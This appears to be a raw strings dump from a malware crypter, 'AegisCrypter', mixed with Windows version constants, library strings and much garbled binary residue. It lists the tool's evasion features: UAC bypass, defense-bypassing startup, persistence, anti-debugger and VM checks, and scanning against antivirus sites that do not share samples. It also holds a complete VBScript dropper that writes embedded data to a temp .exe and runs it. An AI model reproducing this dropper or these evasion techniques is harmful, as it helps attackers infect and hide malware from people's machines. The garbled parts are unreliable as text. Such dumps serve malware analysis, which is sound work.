WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_CORE
Windows 2008 Enterprise Server V
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_V
Windows 2008 Enterprise Server Core V
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_CORE_V
Windows 2008 Enterprise Server IA64
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_IA64
Windows 2008 Home Basic
WIN_VER_WINDOWS2008_HOME_BASIC
Windows 2008 Home Premium
WIN_VER_WINDOWS2008_HOME_PREMIUM
Windows 2008 Home Server
WIN_VER_WINDOWS2008_HOME_SERVER
Windows 2008 Server For Small Business
WIN_VER_WINDOWS2008_SERVER_FOR_SMALLBUSINESS
Windows 2008 Small Business Server
WIN_VER_WINDOWS2008_SMALLBUSINESS_SERVER
Windows 2008 Small Business Server Premium
WIN_VER_WINDOWS2008_SMALLBUSINESS_SERVER_PREMIUM
Windows 2008 Medium Business Server Management
WIN_VER_WINDOWS2008_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows 2008 Medium Business Server Messaging
WIN_VER_WINDOWS2008_MEDIUMBUSINESS_SERVER_MESSAGING
Windows 2008 Medium Business Server Security
WIN_VER_WINDOWS2008_MEDIUMBUSINESS_SERVER_SECURITY
Windows 2008 Standard Server
WIN_VER_WINDOWS2008_STANDARD_SERVER
Windows 2008 Standard Server V
WIN_VER_WINDOWS2008_STANDARD_SERVER_V
Windows 2008 Standard Server Core
WIN_VER_WINDOWS2008_STANDARD_SERVER_CORE
Windows 2008 Standard Server Core V
WIN_VER_WINDOWS2008_STANDARD_SERVER_CORE_V
Windows 2008 Starter
WIN_VER_WINDOWS2008_STARTER
Windows 2008 Storage Enterprise Server
WIN_VER_WINDOWS2008_STORAGE_ENTERPRISE_SERVER
Windows 2008 Storage Express Server
WIN_VER_WINDOWS2008_STORAGE_EXPRESS_SERVER
Windows 2008 Storage Standard Server
WIN_VER_WINDOWS2008_STORAGE_STANDARD_SERVER
Windows 2008 Storage Workgroup Server
WIN_VER_WINDOWS2008_STORAGE_WORKGROUP_SERVER
Windows 2008 Undefined
WIN_VER_WINDOWS2008_UNDEFINED
Windows 2008 Ultimate
WIN_VER_WINDOWS2008_ULTIMATE
Windows 2008 Web Server
WIN_VER_WINDOWS2008_WEB_SERVER
Windows 2008 Web Server Core
WIN_VER_WINDOWS2008_WEB_SERVER_CORE
Windows 2008 Unlicensed
WIN_VER_WINDOWS2008_UNLICENSED
Windows 2008 R2
WIN_VER_WINDOWS2008R2
Windows 2008 R2 Business
WIN_VER_WINDOWS2008R2_BUSINESS
Windows 2008 R2 Cluster Server
WIN_VER_WINDOWS2008R2_CLUSTER_SERVER
Windows 2008 R2 Datacenter Server
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER
Windows 2008 R2 Datacenter Server Core
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER_CORE
Windows 2008 R2 Datacenter Server Core V
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER_CORE_V
Windows 2008 R2 Datacenter Server V
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER_V
Windows 2008 R2 Enterprise
WIN_VER_WINDOWS2008R2_ENTERPRICE
Windows 2008 R2 Enterprise Server
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER
Windows 2008 R2 Enterprise Server Core
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_CORE
Windows 2008 R2 Enterprise Server V
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_V
Windows 2008 R2 Enterprise Server Core V
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_CORE_V
Windows 2008 R2 Enterprise Server IA64
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_IA64
Windows 2008 R2 Home Basic
WIN_VER_WINDOWS2008R2_HOME_BASIC
Windows 2008 R2 Home Premium
WIN_VER_WINDOWS2008R2_HOME_PREMIUM
Windows 2008 R2 Home Server
WIN_VER_WINDOWS2008R2_HOME_SERVER
Windows 2008 R2 Server For Small Business
WIN_VER_WINDOWS2008R2_SERVER_FOR_SMALLBUSINESS
Windows 2008 R2 Small Business Server
WIN_VER_WINDOWS2008R2_SMALLBUSINESS_SERVER
Windows 2008 R2 Small Business Server Premium
WIN_VER_WINDOWS2008R2_SMALLBUSINESS_SERVER_PREMIUM
Windows 2008 R2 Medium Business Server Management
WIN_VER_WINDOWS2008R2_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows 2008 R2 Medium Business Server Messaging
WIN_VER_WINDOWS2008R2_MEDIUMBUSINESS_SERVER_MESSAGING
Windows 2008 R2 Medium Business Server Security
WIN_VER_WINDOWS2008R2_MEDIUMBUSINESS_SERVER_SECURITY
Windows 2008 R2 Standard Server
WIN_VER_WINDOWS2008R2_STANDARD_SERVER
Windows 2008 R2 Standard Server V
WIN_VER_WINDOWS2008R2_STANDARD_SERVER_V
Windows 2008 R2 Standard Server Core
WIN_VER_WINDOWS2008R2_STANDARD_SERVER_CORE
Windows 2008 R2 Standard Server Core V
WIN_VER_WINDOWS2008R2_STANDARD_SERVER_CORE_V
Windows 2008 R2 Starter
WIN_VER_WINDOWS2008R2_STARTER
Windows 2008 R2 Storage Enterprise Server
WIN_VER_WINDOWS2008R2_STORAGE_ENTERPRISE_SERVER
Windows 2008 R2 Storage Express Server
WIN_VER_WINDOWS2008R2_STORAGE_EXPRESS_SERVER
Windows 2008 R2 Storage Standard Server
WIN_VER_WINDOWS2008R2_STORAGE_STANDARD_SERVER
Windows 2008 R2 Storage Workgroup Server
WIN_VER_WINDOWS2008R2_STORAGE_WORKGROUP_SERVER
Windows 2008 R2 Undefined
WIN_VER_WINDOWS2008R2_UNDEFINED
Windows 2008 R2 Ultimate
WIN_VER_WINDOWS2008R2_ULTIMATE
Windows 2008 R2 Web Server
WIN_VER_WINDOWS2008R2_WEB_SERVER
Windows 2008 R2 Web Server Core
WIN_VER_WINDOWS2008R2_WEB_SERVER_CORE
Windows 2008 R2 Unlicensed
WIN_VER_WINDOWS2008R2_UNLICENSED
Windows 7
WIN_VER_WINDOWSSEVEN
Windows 7 Business
WIN_VER_WINDOWSSEVEN_BUSINESS
Windows 7 Cluster Server
WIN_VER_WINDOWSSEVEN_CLUSTER_SERVER
Windows 7 Datacenter Server
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER
Windows 7 Datacenter Server Core
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER_CORE
Windows 7 Datacenter Server Core V
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER_CORE_V
Windows 7 Datacenter Server V
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER_V
Windows 7 Enterprise
WIN_VER_WINDOWSSEVEN_ENTERPRICE
Windows 7 Enterprise Server
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER
Windows 7 Enterprise Server Core
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_CORE
Windows 7 Enterprise Server V
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_V
Windows 7 Enterprise Server Core V
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_CORE_V
Windows 7 Enterprise Server IA64
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_IA64
Windows 7 Home Basic
WIN_VER_WINDOWSSEVEN_HOME_BASIC
Windows 7 Home Premium
WIN_VER_WINDOWSSEVEN_HOME_PREMIUM
Windows 7 Home Server
WIN_VER_WINDOWSSEVEN_HOME_SERVER
Windows 7 Server For Small Business
WIN_VER_WINDOWSSEVEN_SERVER_FOR_SMALLBUSINESS
Windows 7 Small Business Server
WIN_VER_WINDOWSSEVEN_SMALLBUSINESS_SERVER
Windows 7 Small Business Server Premium
WIN_VER_WINDOWSSEVEN_SMALLBUSINESS_SERVER_PREMIUM
Windows 7 Medium Business Server Management
WIN_VER_WINDOWSSEVEN_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows 7 Medium Business Server Messaging
WIN_VER_WINDOWSSEVEN_MEDIUMBUSINESS_SERVER_MESSAGING
Windows 7 Medium Business Server Security
WIN_VER_WINDOWSSEVEN_MEDIUMBUSINESS_SERVER_SECURITY
Windows 7 Standard Server
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER
Windows 7 Standard Server V
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER_V
Windows 7 Standard Server Core
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER_CORE
Windows 7 Standard Server Core V
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER_CORE_V
Windows 7 Starter
WIN_VER_WINDOWSSEVEN_STARTER
Windows 7 Storage Enterprise Server
WIN_VER_WINDOWSSEVEN_STORAGE_ENTERPRISE_SERVER
Windows 7 Storage Express Server
WIN_VER_WINDOWSSEVEN_STORAGE_EXPRESS_SERVER
Windows 7 Storage Standard Server
WIN_VER_WINDOWSSEVEN_STORAGE_STANDARD_SERVER
Windows 7 Storage Workgroup Server
WIN_VER_WINDOWSSEVEN_STORAGE_WORKGROUP_SERVER
Windows 7 Undefined
WIN_VER_WINDOWSSEVEN_UNDEFINED
Windows 7 Ultimate
WIN_VER_WINDOWSSEVEN_ULTIMATE
Windows 7 Web Server
WIN_VER_WINDOWSSEVEN_WEB_SERVER
Windows 7 Web Server Core
WIN_VER_WINDOWSSEVEN_WEB_SERVER_CORE
Windows 7 Unlicensed
WIN_VER_WINDOWSSEVEN_UNLICENSED
Portuguese (Brazil)
Portuguese (Portugal)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
.Owner
W:\3rdparty\ScreamSec\SecUtils.pas
TCipher.CreateIntf: Algorithm mismatch
TBlockCipher.CreateIntf: Wrong VectorSize
Cipher mode not supported
The vector for %s is %d blocks. Cannot initialize with a %d block vector.
The block size for %s is %d bytes and the key is %d bytes. Cannot initialize with a %d block vector.
The minimum key and IV size for %s is %d bytes.
Not supported
TRijndael_PipedPCFB
Rijndael: Invalid key size - %d
2.16.840.1.101.3.4.1.1
2.16.840.1.101.3.4.1.21
2.16.840.1.101.3.4.1.41
1.3.6.1.4.1.13085.1.22
1.3.6.1.4.1.13085.1.23
1.3.6.1.4.1.13085.1.24
2.16.840.1.101.3.4.1.4
2.16.840.1.101.3.4.1.24
2.16.840.1.101.3.4.1.44
1.3.6.1.4.1.13085.1.7
1.3.6.1.4.1.13085.1.8
1.3.6.1.4.1.13085.1.9
1.3.6.1.4.1.13085.1.4
1.3.6.1.4.1.13085.1.5
1.3.6.1.4.1.13085.1.6
1.3.6.1.4.1.13085.1.10
1.3.6.1.4.1.13085.1.11
1.3.6.1.4.1.13085.1.12
1.3.6.1.4.1.13085.1.1
1.3.6.1.4.1.13085.1.2
1.3.6.1.4.1.13085.1.3
1.3.6.1.4.1.13085.1.16
1.3.6.1.4.1.13085.1.17
1.3.6.1.4.1.13085.1.18
2.16.840.1.101.3.4.1.2
2.16.840.1.101.3.4.1.22
2.16.840.1.101.3.4.1.42
1.3.6.1.4.1.13085.1.19
1.3.6.1.4.1.13085.1.20
1.3.6.1.4.1.13085.1.21
2.16.840.1.101.3.4.1.3
2.16.840.1.101.3.4.1.23
2.16.840.1.101.3.4.1.43
2.16.840.1.101.3.4.1.5
2.16.840.1.101.3.4.1.25
2.16.840.1.101.3.4.1.45
/* Dr Brian Gladman (gladman@seven77.demon.co.uk) 14th January 1999 */
TGenerator.Create: Cipher mode must be cmCTR.
TMPPool.CheckThreadID: Called from the wrong thread.
TMPPool.Cache: Invalid pointer
TMPPool.Obtain: Out of memory
TMPPool.InternalCheck: Invalid pointer
Portugal
Turkey
12345678-
ole32.dll
comctl32.dll
!"#$%&*;<=>@[]^_`{|}
TNT Internal Error: TWideComponentHelper.Create should never be encountered.
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntClasses.pas
ntdll.dll
EInvalidGraphicOperation
USER32.DLL
uxtheme.dll
Proportional
MAPI32.DLL
TComboBoxExEnumerator
ssHorizontal
OnKeyDown
OnKeyPress|
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
HelpKeyword
OnExecute<iG
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
AutoHotkeys
AutoHotkeys0_H
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
imm32.dll
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntActnList.pas
PasswordChar
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntStdCtrls.pas
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntForms.pas
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntMenus.pas
Internal Error: SyncHotKeyPosition Failed ("%s" <> "%s").
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntControls.pas
Internal Error: SubClassUnicodeControl.Control is not Unicode.
.UnicodeClass
TntUnicodeVcl.DestroyWindow
Software\Microsoft\Windows\CurrentVersion
ProductKey
Software\Microsoft\Windows NT\CurrentVersion
\\.\Scsi0:
\\.\SMARTVSD
\\.\%s
\\.\PhysicalDrive0
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntRegistry.pas
#$%&'()* ,-./01234
PSAPI.dll
VBoxService.exe
ÞFAULT FOLDER%
%SYSTEM FOLDER%
%WINDOWS FOLDER%
Mutex object: Unique: %d-%d. Number: %d
%s\%.8x%.8x-%.8x%.8x
Ú4'
THookWindowsAPI
EP_RegCheckKey
EP_RegCheckKeyA
EP_RegCheckKeyW
EP_RegSaveKey
EP_RegSaveKeyA
EP_RegSaveKeyW
EP_RegLoadKey
EP_RegLoadKeyA
EP_RegLoadKeyW
EP_RegLoadAndCheckKey
EP_RegCheckAndSaveKey
EP_RegCheckAndSaveKeyA
EP_RegCheckAndSaveKeyW
EP_RegDeleteKey
EP_RegKeyExpirationDate
EP_RegKeyExpirationDateEx
EP_RegKeyCreationDate
EP_RegKeyCreationDateEx
EP_RegKeyExecutions
EP_RegKeyExecutionsTotal
EP_RegKeyExecutionsLeft
EP_RegKeyDays
EP_RegKeyDaysTotal
EP_RegKeyDaysLeft
EP_RegKeyRuntime
EP_RegKeyRuntimeTotal
EP_RegKeyRuntimeLeft
EP_RegKeyGlobalTime
EP_RegKeyGlobalTimeTotal
EP_RegKeyGlobalTimeLeft
EP_RegKeyRegisterAfterDate
EP_RegKeyRegisterAfterDateEx
EP_RegKeyRegisterBeforeDate
EP_RegKeyRegisterBeforeDateEx
EP_TrialExecutions
EP_TrialExecutionsTotal
EP_TrialExecutionsLeft
EP_TrialExecutionTime
EP_TrialExecutionTimeTotal
EP_TrialExecutionTimeLeft
EP_RegCheckKeyEx
EP_RegSaveKeyEx
EP_RegLoadKeyEx
EP_CheckUpStartupPasswordHashString
EP_ProtectedStringByKey
DLL_Loader_Import_Unit
TInitImport
-pri}
Function %s not found in module %s
File not found: %s
Can't find DLL entry point %s in %s
"%s" %s
%s %s
Could not load library: %s
TExportedp
\\.\NTICE
\\.\SICE
\\.\SIWDEBUG
)TEnigmaProtectorLoaderFormStartuppassword
DLL_Loader_RunPassword_Unit
Application requires password to start
decrypt_on_execute_begin
ECRONEXECB
decrypt_on_execute_end
ECRONEXECE
Xz}5786A6B5894D8BC900201B810DA4A1ADD4351378790A98138533067CP4S86R7D8THS45GBCVUM635EPRQRMYRP3DAA5DUPZ6ABDSFP7F5ACP7ERGH4A7Y6B6NW6NMMBZF83WVER9Y4MMBNLBQDKR7KFVLGLV067CFDQCWCHGQVVRN24DECEPBL96YJQJTVDCRTNQG3E4WW4GK4GQ5X5L5H88D3XYHCBRBNASPD3P5CNYFKFHBCSDHHD6WPTCC4XVSM5S88067C2JSTCMVT48C8HC7SHKGTFJBM28P6XTBCNWHMV6J6KN6W5Q9TQLVR285U6GVCAAUTZLRTPSRGDQ742B4742XF4MACRR747YDP5FZZ9D
notepad\secret.datt
.Wx=s
application.exe
iu2.iu
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegOpenKeyA
RegFlushKey
RegCreateKeyExA
GetWindowsDirectoryW
GetWindowsDirectoryA
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
VkKeyScanW
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyW
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextW
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
SHFolder.dll
shell32.dll
ShellExecuteW
DLL_Loader.dll
?!?%?)?-?1?5?
>$?(?,?0?4?8?
?"?&?*?.?2?6?:?
2#202?2]2
: :&:2:::
<%< <7<?<{<
= =$=(=,=0=4=8=<=?>
94989<9`9
0)1-11151<1
6"6&6:6_6
4O4N4j4r4
? ?$?(?,?0?4?
2 2$222:273
7%7,747=7
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
TntWindows
UrlMon
KeyRoutines
 DLL_Loader_Import_Unit
_enigma_keygen_routines
.reloc
msimg32.dll
comdlg32.dll
winspool.drv
shlwapi.dll
oledlg.dll
gdiplus.dll
imagehlp.dll
crypt32.dll
oleacc.dll
wininet.dll
winmm.dll
ImageGetCertificateHeader
HttpQueryInfoW
%d-26
/<D@2bt.qm
r'.qp
C^%c\dq
%DT4q{>
@^.TZt
.yd?9&o
.idat
Str.gg
%S!o$
kern0l32.ud
:.fk>Hd3*
<t%saI
^L.CZ
:H.Cb
S.rArRK) 
.Ww!7
}V,W%U
Keyw
%ss[4d]
wvoM/%cG
a<&||Q/.WJ
{:%cT
uT%f/
\-84%ss_Jd
n"%F!
.jvjUy
0123456
.AMinu
rkeyyR
(),-./:?
%&*;<=>@
[]^_`{|}
f=~%uc
4.Sr[
>/`
h.JxI
%u<x!P&
4b.fWj)
&0 %F<U
pIDuw%c
B|%s'-
-=.tQ
:!0_ 41 )
j-~.RDr#~
"%s1,4)
o%FQ3
WtCp
1234567
%xieD)%m${
>,939498'9
%cr}2
r:%u.
,u%X'
%cjTSR
fV5i%f
df` %f
("9%s
p-rT}
U.YLL
"ÓA
\..ESc
$%&'()* 
,-./012;
RG.Mt?.
.EVH2Z
%D<EF
%drj8ID\X
%^.Ghq
T".Dg
H7LiY.%U
Mk!.sum(f
.UBaN
p:L. H.pL 
%xtN3
' '$'(',%0
:.gb$i2
;r.Jm
t.tMJ6%\d
\J.nF
F<r.rFI^>$
"T'^%d
D9Y-pw%d
|P8h%x_
MTL%dl
N%dSH-
.UoeE-
y9FR%c
zj 5%d
d{.tA%
12345678
9#9'9 9/93.7|
q:\1A
L:\QR
%dv`\(
Site : hXXp://VVV.enigmaprotector.com/
E-mail : support@enigmaprotector.com
Lisence holder: %sW
>f.vs*
%shZeXJ?
=G5$t%dT
>7.UNEe^
.mPb<
d/.fh
tB0%x
O %U<
A:.di
R%:.Vm/
%DVsP 
.Wx=a00uD
apGlicgt@on.erx
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
Advapi32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
accKeyboardShortcut
wuser32.dll
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
hXXp://
WININET.DLL
HTTP/1.0
SHELL32.DLL
lXXxXXXXXXXX
dwmapi.dll
UxTheme.dll
eShell32.dll
%s:%x:%x:%x:%x
mfcm100u.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
&%d %s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
COMCTL32.DLL
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
MFCLink_UrlPrefix
MFCLink_Url
%sPane-%d%x
%sPane-%d
%sBasePane-%d%x
%sBasePane-%d
ShowCmd
%c%d%c%s
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
Hex={X,X,X}
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
windows
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
ENABLE_KEYS
KEYS_MENU
KEYS
RICHED20.DLL
RGB(%d, %d, %d)
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin1.inl
%s (%s:%d)
Exe files(*.exe,*.bat,*.cmd,*.pif,*.scr)|*.exe;*.bat;*.cmd;*.pif;*.scr|All files (*.*)|*.*||
*.exe
Bin files(*.Bin)|*.Bin|All files (*.*)|*.*||
*.Bin
Sorry This stub is private please login
ICO files(*.ico,*.exe,*.dll)|*.ico;*.exe;*.dll |All files(*.*)|*.*||
*.ico
\ac_ico.tmp
Please initialization Key
PE files(*.exe)|*.exe|PE files(*.com)|*.com|PE files(*.bat)|*.bat|PE files(*.cmd)|*.cmd|PE files(*.pif)|*.pif|All files (*.*)|*.*||
%s\upx.exe
cmd /C %s -%d "%s"
cmd /C %s -%d -k --compress-resources=0 --compress-exports=0 "%s"
cmd /c del /s/q %s\iexpress
cmd.exe
Your file is 64bit,ony support 32bit
Maybe isn't a valid stub, or don't support the current version ,try update new version
%d-%d-%d
Your file is 64bit,only support 32bit
Your file is VB/C# .NET (support)
hXXp://VVV.facebook.com/aegiscrypter
hXXp://plus.google.com/116041438552946989350
hXXp://VVV.aegiscrypter.com
\Stub1.Bin
Icon or exe
Sorry Bypass UAC is the private version
-F:*.*
expand.exe
\z.cmd
\z.cm_
%s\iexpress.exe
/N %s\X.SED
s%s\X.SED
AppLaunched=1.exe
FILE1="1.ex_"
FILE0="1.exe"
i.aegiscrypter.com
x/ab.xml
Referer: i.aegiscrypter.com
x/pb.xml
hXXp://i.aegiscrypter.com/x/pb/
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.1
x/vbs.xml
Take some time, please wait...depending on your file size
xxxxxxxxxxxxxxxxxxxx
Script files(*.vbs)|*.vbs|Script files(*.vbe)|*.vbe|All files (*.*)|*.*||
*.vbs
":::::::::::::::::::::::::b1="%temp%":a1="ws.E":a2="xe":a3="c fn":data=split(d358yhfd,"M")(1):sub saveFile(fName,str):dim temp:set xmldoc = CreateObject("Microsoft.XMLDOM"):xmldoc.loadXml "<?xml version=""1.0""?>":set pic = xmldoc.createElement("pic"):pic.dataType = "bin.hex":pic.nodeTypedValue = str:temp = pic.nodeTypedValue:with CreateObject("ADODB.Stream"):.type = 1:.open:.write temp:.saveToFile fName, 2:.close:END WITH:END sub:set ws = CreateObject("WScript.Shell"):fn = ws.ExpandEnvironmentStrings(b1) & "\57yhyh.ExE":saveFile fn,data:a5=a1&a2&a3:Execute a5::::::::::::::::::::::::::::::::::
All files (*.*)|*.*||
VBS is a script,can execute in all windows system
%d KB
Exe files(*.exe)|*.exe|All files (*.*)|*.*||
\StringFileInfo\xx\OriginalFilename
\StringFileInfo\xx\ProductName
\StringFileInfo\xx\InternalName
\StringFileInfo\xx\Comments
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\CompanyName
\StringFileInfo\xx\LegalCopyright
wsmprovhost.exe
Windows
Operating System
Please enter password
x/pv.xml
hXXp://i.aegiscrypter.com/x/pv/
Login successful
Username or password incorrect
Login failed
AegisServlet?u=%s&p=%s&m=%s&s=%s
hXXp://i.aegiscrypter.com/LoginServlet?username=%s&password=%s&client=true
hXXp://s.aegiscrypter.com
hXXp://buy.aegiscrypter.com
hXXp://i.aegiscrypter.com
hXXp://nodistribute.com/
Dr. Web
exe files(*.exe)|*.exe|All files (*.*)|*.*||
Bin files(*.sig)|*.sig|All files (*.*)|*.*||
*.sig
\Cert
Script files(*.exe)|*.exe|All files (*.*)|*.*||
hXXp://c.aegiscrypter.com/
SourceServlet?u=%s&p=%s&m=%s&s=%s
SourceServlet?k=%s
Bin files(*.exe)|*.exe|All files (*.*)|*.*||
Please load your exe file
Stub files(*.bin)|*.bin|All files (*.*)|*.*||
hXXp://VVV.aegiscrypter.com/p/code.html
hXXp://i.aegiscrypter.com/
cmd /C %s -%d -k "%s"
cmd /C %s -%d --compress-resources=0 --compress-exports=0 "%s"
UPX Open Source: hXXp://upx.sourceforge.net/
cmd /C %s -d -k "%s"
cmd /C %s -d "%s"
The UPX Team hXXp://upx.sf.net
UPX executable packer
3.05 (2010-04-27)
upx.exe
1, 0, 0, 1
BindStub.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\AegisCrypter.exe
Bypass UAC(Win7/8 32bit)
Delay Execution
EnKey
Support Command
Special Startup ( bypass defense)
Support EOF
Load the version information from another exe
Ultimate Packer for eXecutables
Backup file (.bak)
Install Startup with windows
Startup Key name
Private login
Private user login
Password
Web panel
Don't save password
virustotal.com , virscan.org , jotti.org
Take crypted file to vbs (first crypt your exe ,because vbs will release exe)
Login information
Load exe file
Cert file
Get certs
1.0.0.1
Aegiscrypter.exe
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
DECRYPT_ON_EXECUTE_BEGIN
DECRYPT_ON_EXECUTE_END
%Cookies FOLDER%
Unspecified error (%d) from %s.
debug.log
ÚysToKeyExp%
%RegKey%
%KeyExpYear%
%KeyExpMonth%
%KeyExpDay%
%CU_EXTFILES%
%CU_EXECPR%
%CU_INSTSERV%
%CU_WINVER%
%CU_VIRTTOOLS%
%TrialExecsTotal%
%TrialExecsLeft%
%TrialExecMinsTotal%
%TrialExecMinsLeft%
enigma_ide.dll
Enter password
Change password
New password:
Confirm new password:
c:\users\"%CurrentUserName%"\appdata\local\temp\aegiscrypter.exe
RichEdit line insertion error=This control requires version 4.70 or greater of COMCTL32.DLL
No help keyword specified.
Alt  Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
No help found for %s
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Thread creation error: %s
Thread Error: %s (%d)7CreateClone not implemented for class %s with source %s
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Unsupported clipboard format
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Ancestor for '%s' not found
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

AegisCrypter.exe_3500_rwx_00930000_00038000:

/* Dr Brian Gladman (gladman@seven77.demon.co.uk) 14th January 1999 */
wntdll.dll
er.exe
ukernel32.dll
Mukernelbase.dll
huuser32.dll
dvgdi32.dll
)wlpk.dll
wusp10.dll
vmsvcrt.dll
vadvapi32.dll
,wsechost.dll
]urpcrt4.dll
uoleaut32.dll
vole32.dll
ushell32.dll
vshlwapi.dll
}tversion.dll
Yrmsimg32.dll
.wcomdlg32.dll
&tcomctl32.dll
pwinspool.drv
